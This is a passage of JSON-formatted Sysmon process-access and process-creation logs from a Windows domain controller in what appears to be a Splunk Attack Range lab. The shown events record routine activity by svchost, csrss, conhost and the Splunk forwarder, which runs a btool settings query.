05:46:46.782","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1680,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.782\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.782","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1681,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.782\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-0010F1650300}\r\nSourceProcessId: 3776\r\nSourceThreadId: 3796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-01C6-5F25-0000-001081680300}\r\nTargetProcessId: 3820\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.782","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-0010F1650300}","SourceProcessId":"3776","SourceThreadId":"3796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-01C6-5F25-0000-001081680300}","TargetProcessId":"3820","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1682,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.798\r\nProcessGuid: {A837DB8D-01C6-5F25-0000-0010B7690300}\r\nProcessId: 3840\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /c btool web list settings --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {A837DB8D-01C6-5F25-0000-001081680300}\r\nParentProcessId: 3820\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal_extra_splunkd_service_args","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.798","ProcessGuid":"{A837DB8D-01C6-5F25-0000-0010B7690300}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /c btool web list settings --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{A837DB8D-01C6-5F25-0000-001081680300}","ParentProcessId":"3820","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal_extra_splunkd_service_args","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1683,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.797\r\nSourceProcessGUID: {A837DB8D-01C6-5F25-0000-001081680300}\r\nSourceProcessId: 3820\r\nSourceThreadId: 3824\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nTargetProcessGUID: {A837DB8D-01C6-5F25-0000-0010B7690300}\r\nTargetProcessId: 3840\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+146d6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+d1d8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.797","SourceProcessGUID":"{A837DB8D-01C6-5F25-0000-001081680300}","SourceProcessId":"3820","SourceThreadId":"3824","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","TargetProcessGUID":"{A837DB8D-01C6-5F25-0000-0010B7690300}","TargetProcessId":"3840","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\System32\\ucrtbase.dll+9ea4a|C:\\Windows\\System32\\ucrtbase.dll+9e42e|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+43bc6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+6665|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+146d6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+d1d8|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1684,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.797\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01C6-5F25-0000-0010B7690300}\r\nTargetProcessId: 3840\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.797","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01C6-5F25-0000-0010B7690300}","TargetProcessId":"3840","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1685,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.797\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.797","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1686,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.797\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.797","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1687,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.797\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.797","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1688,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.797\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 